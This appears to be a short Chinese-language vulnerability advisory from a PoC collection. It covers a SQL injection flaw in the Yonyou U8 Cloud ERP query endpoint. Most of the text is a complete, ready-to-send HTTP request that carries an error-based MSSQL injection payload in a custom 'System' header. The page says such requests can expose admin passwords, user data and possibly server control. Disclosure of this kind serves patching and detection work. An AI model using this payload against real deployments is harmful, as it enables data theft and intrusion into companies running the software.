用友 U8 Cloud /u8cloud/api/uapbd/sysinit/query SQL 注入漏洞

2026-04-17 用友U8 Cloud PoC Public

Description

用友U8 Cloud是用友网络科技股份有限公司推出的新一代云ERP产品,面向成长型和中型企业,提供财务管理、供应链管理、生产制造、人力资源管理、协同办公等核心业务模块。该产品基于云计算架构,支持多组织、多工厂、多币种的复杂业务场景,广泛应用于制造、零售、服务等多个行业。用友U8 Cloud存在SQL注入漏洞,攻击者可通过构造恶意请求获取数据库敏感信息,包括管理员密码、用户个人信息等,在高权限情况下甚至可能获取服务器系统权限。

PoC

POST /u8cloud/api/uapbd/sysinit/query HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 2
Accept-Encoding: gzip
Content-Type: application/json
System: test' AND 9219 IN (SELECT (CHAR(113)+(SELECT (CASE WHEN (9219=9219) THEN sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')) ELSE CHAR(48) END))+CHAR(113)))-- ASpL

{}

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities